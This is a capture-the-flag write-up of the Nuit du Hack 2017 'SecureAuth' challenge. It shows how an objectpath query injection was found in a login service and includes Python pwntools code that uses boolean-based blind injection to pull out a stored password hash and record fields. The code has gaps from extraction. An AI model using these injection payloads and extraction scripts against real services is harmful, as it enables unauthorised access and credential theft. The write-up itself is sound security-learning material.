[Nuit du Hack Qualifiers, 2017]
- Category: Exploit
- Points: 350
- Solves: 29
- Description:
SecureAuth is BACK ! A hackerproof version, protected from ALL attacks, with a powerful password encryption and brand new features !
Url tcp://entrop3r.quals.nuitduhack.com:31337/
OK so a exploit challenge, with no binary... hmm let's see.
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Version 2.0
Available commands
# auth
# register
# debug
# exit
~ »
Ah we're greeted with some nice utf-8 art and a couple of commands.
~ » debug
~ » register
Registration Form
Username # user
Username user : OK !
Password # password
Checking password strength...[DEBUG] {'crack_time_display': 'instant', 'crack_time': 0.0, 'score': 0, 'entropy': 0.0, 'password': 'password', 'calc_time': 0.0009300708770751953, 'match_sequence': [{'l33t_entropy': 0, 'dictionary_name': u'passwords', 'matched_word': 'password', 'base_entropy': 0.0, 'i': 0, 'pattern': 'dictionary', 'j': 7, 'rank': 1, 'token': 'password', 'entropy': 0.0, 'uppercase_entropy': 0}]}
Password strength OK : (Entropy : 0.0 - Score : 0)
Could not register. Weak password.
Aha, the debug message looks suspiciously like a python dictionary. So we
probably have a python service here.
The description says "SecureAuth is back", so we searched for SecureAuth and
ndhquals and we found a couple of writeups of a past ndh challenge, which was a
redis injection vulnerability. Maybe this is something similar? From the
SecureAuth writeups we got the idea to use the admin
~ » register
Registration Form
Username # admin
ERROR : User admin already exists !
~ » register
Registration Form
Username # admin'
objectpath exception : SyntaxError: Unknown operator '(operator)', '''
What the hell is objectpath? A quick search revealed a library that can be used to query nested JSON/dictionary data structures: http://objectpath.org/reference.html
So we have some kind of injection vulnerability. We played around a little with the injection:
Username # admin'], [
ERROR : User admin'], [ already exists !
So the query code probably looks something like this:
query = "$.users[@.username is '" + username + "']"
Ah so we can probably do some kind of boolean based injection:
Username # admin' and '1' is '2
Username admin' and '1' is '2 : OK !
Username # admin' and '1' is '1
ERROR : User admin' and '1' is '1 already exists !
Very good. Now we can use this to exfiltrate data. I threw together a little script to perform boolean queries using the injection vulnerability. Note that if we get back that the user doesn't exist, we need to input a password and wait for the password check to complete. This takes ages, so in this case we open a new connection, which is much faster
def new_con():
with context.local(log_level='warning'):
rem = remote("entrop3r.quals.nuitduhack.com", 31337)
return rem
class InjectionFailedException(Exception):
def inject(q, sendpw=True):
global rem
if not rem:
rem = new_con()
rem.recvuntil("Username #")
line = rem.recvline().strip()
log.debug("received line\n{!r}".format(line))
if exc_msg in line:
raise InjectionFailedException(line)
wat = rem.recv()
if "Password" in wat:
if sendpw:
with context.local(log_level='warning'):
rem = new_con()
return line
log.debug("wat is\n" + hexdump(wat))
if "~" not in wat:
wat += rem.recvuntil("~")
log.debug("received the rest:\n" + wat)
return line
except EOFError:
log.warning("got EOF - restarting connection")
with context.local(log_level='warning'):
rem = None
return inject(q, sendpw)
def bool_query(q):
aq = "admin' and {} and '1' is '1".format(q)
line = inject(aq, False)
except InjectionFailedException as e:
log.warning("query failed: {}".format(e))
return None
if "already exists" in line:
return True
return False
So let's try to find out some info about the data:
In [4]: bool_query("$.users")
Out[4]: True
In [5]: bool_query("len($.users) is 1")
Out[5]: True
In [8]: bool_query("len($.users[0]) is 4")
Out[8]: True
In [9]: bool_query("$.users[0].password")
Out[9]: True
In [10]: bool_query("$.users[0].wtf")
Out[10]: False
In [11]: bool_query("$.users[0].entropy")
Out[11]: True
In [12]: bool_query("$.users[0].score")
Out[12]: False
In [13]: bool_query("$.users[0].username")
Out[13]: False
In [14]: bool_query("$.users[0].user")
Out[14]: False
So now we now that the data structure looks something like this:
"users" : [
"password": "???",
"entropy": ???,
"???": ???,
"???": "admin"
So we started by creating a function that exfiltrates the password. We first
performed queries like 'a' in $.users[0].password
to find all the chars in
the password. Then we used queries like $.user[0].password[0] is 'a'
get the value of the password:
char_tries = string.printable[:-6].replace("'", "").replace("\\", "")
def find_str(base_query):
exfiltrate a string using boolean queries
# first find the chars that are contained in the string to speed up
# bruteforcing
char_tries_real = []
pr = log.progress("char_tries[i]")
for i, c in enumerate(char_tries):
pr.status("{!r} ({!r})".format(c, "".join(char_tries_real)))
r = bool_query("'{}' in {}".format(c, base_query))
if r is None:
log.error("dayum char tries")
if r:
log.info("bf alphabet: {!r}".format("".join(char_tries_real)))
pw_len = 100
# for every index, try all possible chars at that index
# abort when no candidate is found (probably end of the string)
password = []
pr0 = log.progress("{}[:i] is: ".format(base_query))
for i in range(pw_len):
pr = log.progress("password[{}] ==".format(i))
for j, c in enumerate(char_tries_real):
pr.status("{!r} ({}/{})".format(c, j, len(char_tries_real)))
r = bool_query("{}[{}] is '{}'".format(base_query, i, c))
if r is None:
if r:
log.warning("couldn't find candidate for {}".format(i))
log.info("string is: {!r} ({})".format("".join(password), len(password)))
return "".join(password)
So what we got was
Well damn. What are we supposed to do with this? Maybe the other fields are the thing. I just guessed a fieldname:
In [16]: bool_query("$.users[0].flag")
Out[16]: True
While trying to find the second flag we then also found a way to get the field
names with queries like array($.users[0])[i]
, i.e.
find_str("array($.users[0])[0]") == "login"
find_str("array($.users[0])[1]") == "password"
find_str("array($.users[0])[2]") == "entropy"
find_str("array($.users[0])[3]") == "flag"
The full data structure is:
"users" : [
"login": "admin",
"password": "$CONFIGSALT$9c2137e18b28698e00f97428aca597a75c4526e90755fadb2704dc3c5ce6627b",
"entropy": 51.558,
Unfortunately we didn't manage to get the second flag for this challenge :(